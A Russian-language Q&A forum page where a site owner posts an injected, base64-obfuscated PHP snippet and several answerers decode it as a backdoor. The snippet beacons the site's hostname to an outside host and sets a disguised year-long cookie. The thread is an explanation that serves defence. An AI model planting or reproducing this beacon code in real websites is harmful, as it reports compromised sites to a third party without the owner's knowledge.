Этот вопрос закрыт для ответов, так как повторяет вопрос Php код на сайте?
boypush
@boypush
Geek

Не могу разобраться код php?

if (!isset($_COOKIE[base64_decode('X3ltX2l1cw==') ]))
	{
	@file_get_contents(base64_decode('aHR0cDovL2wxbDAuY29tL3Av') . $_SERVER['HTTP_HOST']);
	@setcookie(base64_decode('X3ltX2l1cw==') , 1, time() + 31536000, '/', $_SERVER['HTTP_HOST']);
	}


Приветствую, пожалуйста опишите подробно что делает этот кусок кода? Как я понял какая-то операция с куками, но что именно? Этот код замедляет работу сайта.
  • Вопрос задан
  • 175 просмотров
Решения вопроса 3
@dzhebrak
Бэкдор

Подробности есть в похожем вопросе Php код на сайте?
Ответ написан
Adamos
@Adamos
Если не установлена кука с именем "_ym_ius",
дернуть ссылку http: //l1l0.com/p/{адрес сайта}
и установить эту куку, чтобы не дергать этот сайт еще некоторое время (365 дней, если быть точным)
Ответ написан
ixon
@ixon

//В случае, если у пользователя установлена Cookie с названием "_ym_ius" (в кодировке base64 это 'X3ltX2l1cw==')
if (!isset($_COOKIE[base64_decode('X3ltX2l1cw==') ])) 
  {
   // Получаем содержимое файла http://l1l0.com/p/+"Адрес сайта"
  @file_get_contents(base64_decode('aHR0cDovL2wxbDAuY29tL3Av') . $_SERVER['HTTP_HOST']);
   // Устанавливаем Cookie с названием "_ym_ius" и значением 1. 
  @setcookie(base64_decode('X3ltX2l1cw==') , 1, time() + 31536000, '/', $_SERVER['HTTP_HOST']);
  }
Ответ написан
Ваш ответ на вопрос

Вопрос закрыт для ответов и комментариев

Потому что уже есть похожий вопрос.
Похожие вопросы
YCLIENTS Москва
от 200 000 до 350 000 ₽
Ведисофт Екатеринбург
от 25 000 ₽
ИТЦ Аусферр Магнитогорск
от 100 000 до 160 000 ₽